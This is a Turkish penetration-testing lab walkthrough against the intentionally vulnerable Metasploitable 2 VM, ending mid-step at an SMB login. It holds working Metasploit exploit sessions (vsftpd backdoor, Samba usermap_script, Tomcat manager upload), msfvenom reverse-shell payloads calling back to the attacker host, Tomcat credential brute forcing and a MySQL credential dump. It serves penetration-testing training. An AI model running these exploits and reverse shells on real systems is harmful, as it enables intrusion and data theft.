Metasploitable 2 sanal makinesi, sızma testi yapmayı öğrenmek isteyenler için oluşturulmuş bir deneme tahtasıdır diyebiliriz. Bu sanal makine üzerinde birçok zafiyet bulunmaktadır ve bu zafiyetlerin hepsi için geliştirilmiş exploitler mevcuttur.
Bu linkten indirme işlemi gerçekleştirilebilir. İndirilen sanal makine vmware ve virtualbox ortamlarında kullanılabilir. Kısacası bir adet Kali ve bir adet Metasploitable 2 ile kendi saldırgan ve kurban makinelerinizi (attacker – victim) oluşturmanız mümkündür.
Bu aşamada Vmware ve Virtualbox’da nasıl çalıştırılacağınıza değinmeyeceğim. Google size bu konuda yardımcı olacaktır.
Not: Metasploitable makinesinin kullanıcı adı ve parolası : msfadmin/msfadmin
Kali makinesinin (eğer ova dosyası indirdiyseniz) kullanıcı adı ve parolası : root / toor
Keşif Aşaması (Reconnaissance)
Nmap ya da netdiscover gibi araçlarla tarama yaparak aktif ip adresleri tespit edilebilir.
Biz burada nmap kullanarak ilerleyeceğiz. Metasploitable makinesinin ip adresinin bildiğin için tek bir ip adresi için tarama gerçekleştiriyorum. ( 192.168.1.0/24 yazarak tüm bloğu da tarayabilirsiniz.)
root@kali:~# nmap -sV -A -v 192.168.1.21
NSE: Script scanning 192.168.1.21.
Initiating NSE at 14:14
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 14:14, 9.40s elapsed
Initiating NSE at 14:14
Completed NSE at 14:14, 14.30s elapsed
Initiating NSE at 14:14
Completed NSE at 14:14, 0.01s elapsed
Nmap scan report for 192.168.1.21
Host is up (0.00085s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.1.26
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 – secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2019-10-31T18:14:20+00:00; -3s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 – Linux
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open shell Netkit rshd
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info:
| Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 8
| Capabilities flags: 43564
| Some Capabilities: SupportsCompression, Support41Auth, SwitchToSSLAfterHandshake, LongColumnFlag, ConnectWithDatabase, Speaks41ProtocolNew, SupportsTransactions
| Status: Autocommit
|_ Salt: KVNd-P+’}fgRC80’q’jc
5432/tcp open postgresql PostgreSQL DB 8.3.0 – 8.3.7
|_ssl-date: 2019-10-31T18:14:20+00:00; -2s from scanner time.
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ VNC Authentication (2)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 08:00:27:B5:3E:8B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 – 2.6.33
Uptime guess: 0.002 days (since Thu Oct 31 14:12:08 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=206 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -3s
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| METASPLOITABLE<00> Flags: <unique><active>
| METASPLOITABLE<03> Flags: <unique><active>
| METASPLOITABLE<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.85 ms 192.168.1.21
NSE: Script Post-scanning.
Initiating NSE at 14:14
Completed NSE at 14:14, 0.00s elapsed
Initiating NSE at 14:14
Completed NSE at 14:14, 0.00s elapsed
Initiating NSE at 14:14
Completed NSE at 14:14, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.25 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.430KB)
root@kali:~#
Nmap taraması tamamlandığında açık portları ve bu portlarda çalışan servisler hakkındaki bilgilerin olduğu bir çıktı ile karşılaşıyoruz.Daha sade bir çıktı elde etmek için aşağıdaki komut kullanılabilir.
nmap -n -sV –open -p 0-65535 192.168.1.21
Port tarama işlemini gerçekleştirdiğimize göre sırayla zafiyetleri sömürmeye çalışalım.
FTP portunun açık olduğunu ve vsftpd 2.3.4 çalıştığını görüyoruz. O zaman ilk hamlemiz FTP için gelsin.
Vsftp 2.3.4 için bilinen bir zafiyet ve yayınlanmış bir exploit var mı bilgisine google üzerinden erişebiliriz. Ancak ben google aramasından önce msfconsole’u açacağım ve orada bir arama yapacağım.
root@kali:~# msfconsole
[-] ***rtiNg the Metasploit Framework console…-
[-] * WARNING: No database support: No database YAML file
=[ metasploit v5.0.53-dev ]
+ — –=[ 1931 exploits – 1079 auxiliary – 331 post ]
+ — –=[ 556 payloads – 45 encoders – 10 nops ]
+ — –=[ 7 evasion ]
msf5 >
msf5 > search vsftpd
sf5 > search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
– —- ————— —- —– ———–
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
msf5 >
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
—- ————— ——– ———–
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
— —-
0 Automatic
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.21
RHOSTS => 192.168.1.21
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.1.21:21 – Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.21:21 – USER: 331 Please specify the password.
[+] 192.168.1.21:21 – Backdoor service has been spawned, handling…
[+] 192.168.1.21:21 – UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.26:46385 -> 192.168.1.21:6200) at 2019-10-31 14:50:57 -0400
shell
[*] Trying to find binary(python) on target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
sh-3.2# whoami
whoami
root
sh-3.2# uname -a
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
sh-3.2#
Sisteme erişim sağladıktan sonra whoami komutu ile sisteme root yetkisi ile erişim sağlandığı görüntülenir. Aşağıdaki şekilde bash konsoluna da geçiş yapılabilir.
sh-3.2# bash -i
bash -i
root@metasploitable:/#
Bu örnek için google araması ile python scriptleri bulunarak da zafiyeti sömürme işlemi gerçekleştirilebilir.
Örnek olması açısından aşağıdaki scriptler işe yarayabilir.
https://www.exploit-db.com/exploits/17491
https://raw.githubusercontent.com/In2econd/vsftpd-2.3.4-exploit/master/vsftpd_234_exploit.py
Şimdi de 139 portunu hedef alarak samba üzerinden hedef makineyi ele geçirmeye çalışalım.
msf5 > search samba smbd
Matching Modules
================
# Name Disclosure Date Rank Check Description
– —- ————— —- —– ———–
0 auxiliary/admin/smb/check_dir_file normal Yes SMB Scanner Check File/Directory Utility
1 auxiliary/admin/smb/samba_symlink_traversal normal No Samba Symlink Directory Traversal
2 auxiliary/dos/samba/lsa_addprivs_heap normal No Samba lsa_io_privilege_set Heap Overflow
3 auxiliary/dos/samba/lsa_transnames_heap normal No Samba lsa_io_trans_names Heap Overflow
4 auxiliary/dos/samba/read_nttrans_ea_list normal No Samba read_nttrans_ea_list Integer Overflow
5 auxiliary/scanner/rsync/modules_list normal Yes List Rsync Modules
6 auxiliary/scanner/smb/smb_uninit_cred normal Yes Samba _netr_ServerPasswordSet Uninitialized Credential State
7 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86)
8 exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86)
9 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load
10 exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow
11 exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow
12 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)
13 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 – 2.2.6 nttrans Buffer Overflow
14 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba “username map script” Command Execution
15 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
16 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC)
17 exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
18 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC)
19 exploit/unix/http/quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection
20 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
21 exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Yes Citrix Access Gateway Command Execution
22 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution
23 exploit/windows/http/sambar6_search_results 2003-06-21 normal Yes Sambar 6 Search Results Buffer Overflow
24 exploit/windows/license/calicclnt_getconfig 2005-03-02 average No Computer Associates License Client GETCONFIG Overflow
25 exploit/windows/smb/group_policy_startup 2015-01-26 manual No Group Policy Script Execution From Shared Resource
26 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
27 post/linux/gather/enum_configs normal No Linux Gather Configurations
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
—- ————— ——– ———–
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’
RPORT 139 yes The target port (TCP)
Exploit target:
Id Name
— —-
0 Automatic
msf5 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.1.21
RHOSTS => 192.168.1.21
msf5 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP double handler on 192.168.1.26:4444
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo qWgXFlEMnytAxl18;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “qWgXFlEMnytAxl18\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (192.168.1.26:4444 -> 192.168.1.21:33703) at 2019-10-31 15:02:21 -0400
shell
[*] Trying to find binary(python) on target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
whoami
whoami
root
sh-3.2# bash -i
bash -i
root@metasploitable:/# uname -a
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root@metasploitable:/#
139 nolu porttan Samba zafiyetni de sömürdük. Bu sefer biraz önce bahsettiğimiz metodu da uygulayarak devam edelim.
Google’da aşağıdaki gibi bir arama gerçekleştiriyorum.
samba smbd 3.x – 4.x exploit github
https://gist.github.com/joenorton8014/19aaa00e0088738fc429cff2669b9851 adresini açıyorum ve exploit.py dosyasını indiriyorum. Python ile çalıştırmak istediğimde nasıl kullanacağıma dair bir bilgilendirme ile karşılaşıyorum.
root@kali:~# python exploit.py
Usage: exploit.py <HOST>
Şimdi msfvenom ile exploitin içindeki payload kısmını kendimize bind shell alacak şekilde düzenliyoruz.
root@kali:~# msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.1.26 LPORT=6666 -f python
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 94 bytes
Final size of python file: 475 bytes
buf = b””
buf += b”\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x65″
buf += b”\x65\x64\x64\x74\x3b\x20\x6e\x63\x20\x31\x39\x32\x2e”
buf += b”\x31\x36\x38\x2e\x31\x2e\x32\x36\x20\x36\x36\x36\x36″
buf += b”\x20\x30\x3c\x2f\x74\x6d\x70\x2f\x65\x65\x64\x64\x74″
buf += b”\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f”
buf += b”\x74\x6d\x70\x2f\x65\x65\x64\x64\x74\x20\x32\x3e\x26″
buf += b”\x31\x3b\x20\x72\x6d\x20\x2f\x74\x6d\x70\x2f\x65\x65″
buf += b”\x64\x64\x74″
root@kali:~#
Buradan elde ettiğimiz çıktıyı exploitimizin içindeki alanla aşağıda gördüğünüz gibi değiştiriyoruz.
Exploiti çalıştırmadan önce netcat ile msfvenom ile ürettiğimiz payload’da belirttiğimiz portu dinlemeye başlıyoruz.
root@kali:~# nc -nvlp 6666
listening on [any] 6666 …
Şimdi exploit.py dosyasını çalıştırabiliriz.
root@kali:~# python exploit.py 192.168.1.21
Şimdi netcat ile dinleme yaptığımız terminale geçiş yapalım.
root@kali:~# nc -nvlp 6666
listening on [any] 6666 …
connect to [192.168.1.26] from (UNKNOWN) [192.168.1.21] 52985
whoami
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
bash -i
bash: no job control in this shell
root@metasploitable:/#
Ve python scripti ile de metasploitable makinesindeki samba zafiyetini sömürmeyi başardık.
Bu seferde web portlarından biri ile devam edelim. 8180 portunda Apache Tomcat/Coyote JSP engine 1.1 çalıştığını görmüştük yaptığımız taramada. Bu bilgi doğrultusunda biraz bilgi toplayarak ilerleyelim.
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
Bu sefer de arama ile bilgi toplama aşamasını başlatalım.
msf5 > search apache tomcat
Matching Modules
================
# Name Disclosure Date Rank Check Description
– —- ————— —- —– ———–
0 auxiliary/admin/appletv/appletv_display_video normal No Apple TV Video Remote Control
1 auxiliary/admin/http/tomcat_administration normal Yes Tomcat Administration Tool Default Access
2 auxiliary/admin/http/tomcat_utf8_traversal 2009-01-09 normal Yes Tomcat UTF-8 Directory Traversal Vulnerability
3 auxiliary/admin/http/trendmicro_dlp_traversal 2009-01-09 normal Yes TrendMicro Data Loss Prevention 5.5 Directory Traversal
4 auxiliary/dos/http/apache_commons_fileupload_dos 2014-02-06 normal No Apache Commons FileUpload and Apache Tomcat DoS
5 auxiliary/dos/http/apache_mod_isapi 2010-03-05 normal No Apache mod_isapi Dangling Pointer
6 auxiliary/dos/http/apache_range_dos 2011-08-19 normal Yes Apache Range Header DoS (Apache Killer)
7 auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 normal No Apache Tomcat Transfer-Encoding Information Disclosure and DoS
8 auxiliary/dos/http/hashcollision_dos 2011-12-28 normal No Hashtable Collisions
9 auxiliary/fileformat/odt_badodt 2018-05-01 normal No LibreOffice 6.03 /Apache OpenOffice 4.1.5 Malicious ODT File Generator
10 auxiliary/gather/apache_rave_creds normal No Apache Rave User Information Disclosure
11 auxiliary/gather/impersonate_ssl normal No HTTP SSL Certificate Impersonation
12 auxiliary/scanner/couchdb/couchdb_enum normal Yes CouchDB Enum Utility
13 auxiliary/scanner/http/apache_activemq_source_disclosure normal Yes Apache ActiveMQ JSP Files Source Disclosure
14 auxiliary/scanner/http/apache_activemq_traversal normal Yes Apache ActiveMQ Directory Traversal
15 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
16 auxiliary/scanner/http/apache_optionsbleed 2017-09-18 normal Yes Apache Optionsbleed Scanner
17 auxiliary/scanner/http/apache_userdir_enum normal Yes Apache “mod_userdir” User Enumeration
18 auxiliary/scanner/http/axis_local_file_include normal Yes Apache Axis2 v1.4.1 Local File Inclusion
19 auxiliary/scanner/http/axis_login normal Yes Apache Axis2 Brute Force Utility
20 auxiliary/scanner/http/mod_negotiation_brute normal Yes Apache HTTPD mod_negotiation Filename Bruter
21 auxiliary/scanner/http/mod_negotiation_scanner normal Yes Apache HTTPD mod_negotiation Scanner
22 auxiliary/scanner/http/rewrite_proxy_bypass normal Yes Apache Reverse Proxy Bypass Vulnerability Scanner
23 auxiliary/scanner/http/tomcat_enum normal Yes Apache Tomcat User Enumeration
24 auxiliary/scanner/http/tomcat_mgr_login normal Yes Tomcat Application Manager Login Utility
25 auxiliary/scanner/http/wangkongbao_traversal normal Yes WANGKONGBAO CNS-1000 and 1100 UTM Directory Traversal
26 auxiliary/scanner/ssh/apache_karaf_command_execution 2016-02-09 normal Yes Apache Karaf Default Credentials Command Execution
27 auxiliary/scanner/ssh/karaf_login normal Yes Apache Karaf Login Utility
msf5 > use auxiliary/scanner/http/tomcat_mgr_login
msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name Current Setting Required Description
—- ————— ——– ———–
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no The HTTP password to specify for authentication
PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][…]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI /manager/html yes URI for Manager login. Default is /manager/html
THREADS 1 yes The number of concurrent threads
USERNAME no The HTTP username to specify for authentication
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 192.168.1.21
RHOSTS => 192.168.1.21
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
Ve tüm ayarları yaptıktan sonra exploit komutunu çalıştırıyoruz.
msf5 auxiliary(scanner/http/tomcat_mgr_login) > exploit
-] 192.168.1.21:8180 – LOGIN FAILED: tomcat:manager (Incorrect)
[-] 192.168.1.21:8180 – LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 192.168.1.21:8180 – LOGIN FAILED: tomcat:root (Incorrect)
[+] 192.168.1.21:8180 – Login Successful: tomcat:tomcat
[-] 192.168.1.21:8180 – LOGIN FAILED: both:admin (Incorrect)
[-] 192.168.1.21:8180 – LOGIN FAILED: both:manager (Incorrect)
[-] 192.168.1.21:8180 – LOGIN FAILED: both:role1 (Incorrect)
[-] 192.168.1.21:8180 – LOGIN FAILED: both:root (Incorrect)
[-] 192.168.1.21:8180 – LOGIN FAILED: both:tomcat (Incorrect)
[-] 192.168.1.21:8180 – LOGIN FAILED: both:s3cret (Incorrect)
[-] 192.168.1.21:8180 – LOGIN FAILED: both:vagrant (Incorrect)
[-] 192.168.1.21:8180 – LOGIN FAILED: j2deployer:j2deployer (Incorrect)
[-] 192.168.1.21:8180 – LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
[-] 192.168.1.21:8180 – LOGIN FAILED: cxsdk:kdsxc (Incorrect)
[-] 192.168.1.21:8180 – LOGIN FAILED: root:owaspbwa (Incorrect)
[-] 192.168.1.21:8180 – LOGIN FAILED: ADMIN:ADMIN (Incorrect)
[-] 192.168.1.21:8180 – LOGIN FAILED: xampp:xampp (Incorrect)
[-] 192.168.1.21:8180 – LOGIN FAILED: QCC:QLogic66 (Incorrect)
[-] 192.168.1.21:8180 – LOGIN FAILED: admin:vagrant (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/tomcat_mgr_login) >
Kullanıcı adı ve parola olarak tomcat / tomcat kullanarak login olabileceğimizi görüyoruz.
Biraz önce yaptığımız arama sonuçlarından elde ettiğimiz bilgiler doğrultusunda devam ediyoruz.
msf5 auxiliary(scanner/http/tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_upload
msf5 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS 192.168.1.21
RHOSTS => 192.168.1.21
msf5 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8180
RPORT => 8180
msf5 exploit(multi/http/tomcat_mgr_upload) > set httpusername tomcat
httpusername => tomcat
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword tomcat
httppassword => tomcat
msf5 exploit(multi/http/tomcat_mgr_upload) > exploit
[*] Started reverse TCP handler on 192.168.1.26:4444
[*] Retrieving session ID and CSRF token…
[*] Uploading and deploying 3jgtKzPZ0…
[*] Executing 3jgtKzPZ0…
[*] Undeploying 3jgtKzPZ0 …
[*] Sending stage (53906 bytes) to 192.168.1.21
[*] Meterpreter session 1 opened (192.168.1.26:4444 -> 192.168.1.21:42558) at 2019-10-31 15:46:09 -0400
meterpreter > shell
Process 1 created.
Channel 1 created.
bash -i
bash: no job control in this shell
tomcat55@metasploitable:/$
Kendimize bir backdoor oluşturalım.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.26 LPORT=6666 -f war > c3shell.war
Browser’dan 192.168.1.21:8180 adresini çağırdıktan sonra gelen sayfadan Tomcat Manager’ı tıklıyoruz.
Kullanıcı adı ve parolayı zaten biraz önce bulmuştuk.
WAR file to deploy kısmından Browse diyerek biraz önce msfvenom ile oluşturduğumuz c3shell.war dosyasını yükleyip Deploy butonuna basıyoruz.
Yine terminalde netcat ile dinleme işlemini başlatıyoruz.
root@kali:~# nc -nvlp 6666
listening on [any] 6666 …
Browser’dan deploy ettiğimiz sayfaya erişim sağlamak istediğimizde shell aldığımızı görüyoruz.
Nmap taramızda açık olan portlardan 3306 ile devam edelim. 3306 Mysql portu olduğu için ilk olarak mysql root kullanıcı ile bağlanmayı deneyelim.
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
root@kali:~# mysql -u root -p -h 192.168.1.21
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 10
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.
MySQL [(none)]>
Bingo. Mysql default kurulumda boş parola ile konsoldan erişime izin verir ancak uzak bağlantıya izin vermez. Bu özel bir makine olduğu için bunda da açık bırakılmış.
Şimdi mysql komutları ile ilerleyebiliriz. Bakalım neler bulacağız.
MySQL [(none)]> show databases;
+——————–+
| Database |
+——————–+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+——————–+
7 rows in set (0.001 sec)
MySQL [(none)]> use owasp10;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [owasp10]> show tables;
+——————-+
| Tables_in_owasp10 |
+——————-+
| accounts |
| blogs_table |
| captured_data |
| credit_cards |
| hitlog |
| pen_test_tools |
+——————-+
6 rows in set (0.001 sec)
MySQL [owasp10]> select * from accounts;
+—–+———-+————–+—————————–+———-+
| cid | username | password | mysignature | is_admin |
+—–+———-+————–+—————————–+———-+
| 1 | admin | adminpass | Monkey! | TRUE |
| 2 | adrian | somepassword | Zombie Films Rock! | TRUE |
| 3 | john | monkey | I like the smell of confunk | FALSE |
| 4 | jeremy | password | d1373 1337 speak | FALSE |
| 5 | bryce | password | I Love SANS | FALSE |
| 6 | samurai | samurai | Carving Fools | FALSE |
| 7 | jim | password | Jim Rome is Burning | FALSE |
| 8 | bobby | password | Hank is my dad | FALSE |
| 9 | simba | password | I am a cat | FALSE |
| 10 | dreveil | password | Preparation H | FALSE |
| 11 | scotty | password | Scotty Do | FALSE |
| 12 | cal | password | Go Wildcats | FALSE |
| 13 | john | password | Do the Duggie! | FALSE |
| 14 | kevin | 42 | Doug Adams rocks | FALSE |
| 15 | dave | set | Bet on S.E.T. FTW | FALSE |
| 16 | ed | pentest | Commandline KungFu anyone? | FALSE |
+—–+———-+————–+—————————–+———-+
16 rows in set (0.002 sec)
MySQL [owasp10]>
Gördüğünüz gibi tüm kullanıcı adı ve parola bilgilerine ulaşım sağladık.
1524 portunda bindshell Metasploitable root shell gibi bir açıklama vardı nmap taramamızın sonuçlarında. Belki de en kolay shell alma işlemini bu port üzerinden gerçekleştireceğiz.
Yapmamız gereken tek şey;
root@kali:~# nc 192.168.1.21 1524
root@metasploitable:/# whoami
root
root@metasploitable:/# uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root@metasploitable:/#
Fazla kolay değil mi? Bazen basit düşünmek gerekiyor.
NFS ile devam ediyoruz.
2049/tcp open nfs 2-4 (RPC #100003)
Madem nfs üzerinden zafiyeti sömürmeye çalışacağız o zaman hedef makine üzerindeki paylaşımları ve bu paylaşımların izinlerini listeleyerek işe başlayabiliriz.
root@kali:~# smbmap -H 192.168.1.21
[+] Finding open SMB ports….
[+] User SMB session establishd on 192.168.1.21…
[+] IP: 192.168.1.21:445 Name: 192.168.1.21
Disk Permissions
—- ———–
print$ NO ACCESS
tmp READ, WRITE
opt NO ACCESS
IPC$ NO ACCESS
ADMIN$ NO ACCESS
root@kali:~#
Süper /tmp dizini için okuma ve yazmanın açık olduğu bir paylaşım var. Bunu kendi makinemize mount edelim o zaman.
root@kali:~# smbclient //192.168.1.21/tmp
Enter WORKGROUP\root’s password:
Anonymous login successful
Try “help” to get a list of possible commands.
smb: \>
Neler yapabildiğimizi görmek için biraz etrafı kolaçan edelim.
Dizinde kilitli kalmış gibi görünüyoruz. Help dediğimizde çıkan komutlarla ilerleyebilir miyiz acaba?
logon komutu ile netcat çalıştırmayı ve kendi makinemde listener açarak shell almayı deneyeceğim.
Bunun için;
Önce kendi makinemde nc -nvlp 6666 komutunu çalıştırıyorum.
Ardından Metasploitable makinesinde smb oturumunda aşağıdaki şekilde netcat çalıştırıyorum ve login atlatma uyguluyorum.
root@kali:~# smbclient //192.168.1.21/tmp
